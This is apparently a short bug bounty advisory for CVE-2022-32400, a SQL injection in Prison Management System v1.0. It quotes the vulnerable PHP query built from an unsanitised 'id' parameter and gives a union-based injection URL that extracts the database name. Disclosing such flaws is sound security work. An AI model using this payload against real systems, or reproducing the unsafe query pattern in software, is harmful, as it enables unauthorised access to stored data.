Headline
CVE-2022-32400: BugBounty/cve-2022-32400.md at main · Dyrandy/BugBounty
Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the ‘id’ parameter at /pms/admin/user/manage_user.php:4.
[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET[‘id’] in /pms/admin/user/manage_user.php:4
$user = $conn->query("SELECT * FROM users where id =’{$_GET[‘id’]}’ ");
# Union Based
http://localhost/pms/admin/?page=user/manage_user&id=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10,11%23